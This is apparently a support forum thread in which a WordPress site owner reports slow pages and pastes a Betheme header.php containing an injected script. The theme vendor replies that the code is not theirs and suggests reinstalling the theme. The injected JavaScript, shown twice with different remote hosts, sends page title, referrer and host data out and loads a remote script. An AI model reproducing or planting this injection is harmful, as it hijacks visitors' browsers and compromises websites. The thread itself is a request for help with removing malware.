Loading unknown Url in backend.

Dear Team,

Whenever i load the kirtanlal.ae website pages , some unknown is loading from backend due to this the pages takes more time to load.

I found this urls in wp-content/themes/betheme/header.php file, please check below code of header.php, & the infection is in bold characters.


Comments

  • <?php
    /**
     * The Header for our theme.
     *
     * @package Betheme
     * @author Muffin group
     */
    ?><!DOCTYPE html>
    <?php 
    if( $_GET && key_exists('mfn-rtl', $_GET) ):
    echo '<html class="no-js" lang="ar" dir="rtl">';
    else:
    ?>
    <html class="no-js" <?php language_attributes(); ?> <?php mfn_tag_schema(); ?>>
    <?php endif; ?>

    <!-- head -->
    <head>

    <!-- meta -->
    <meta charset="<?php bloginfo( 'charset' ); ?>" />
    <?php if( mfn_opts_get('responsive') ) echo '<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">'; ?>


    <?php do_action('wp_seo'); ?>

    <link rel="shortcut icon" href="<?php mfn_opts_show('favicon-img',THEME_URI .'/images/favicon.ico'); ?>" type="image/x-icon" />

    <!-- wp_head() -->
    <?php wp_head(); ?>

    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://bahbko93.dax.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
    </head>

    <!-- body -->
    <body <?php body_class(); ?>...........

  • Hi,

    we have no idea where from you get this code but our header.php file does not look like that. So or someone added it or your server has been hacked.
  • Again the pages are taking too much time to load, Last time, you dind found the error in header.php, because i had delete that one, but if you check now you will find this code,

    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://cotelogistique.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

    also if you see down to waiting process , you will find this URL http://cotelogistique.com , which is in above code. & if i delete the above code from Header.php, the site gets speed up.

    Please suggest the permanent solutions for this. 
  • While loading the kirtanlal.ae website pages , if you see down to waiting process , you will find this URL http://cotelogistique.com , which is in above code. & if i delete the above code from Header.php, the site gets speed up.
  • Dear Team,

    Still awaiting the response.
  • Like we wrote above, the code you presented, does not come with our theme. We recommend to remove all theme files via FTP and upload them once again but via FTP only.

    P.S. We recommend to check our profile's page where you can find info what time and when we work.
Sign In or Register to comment.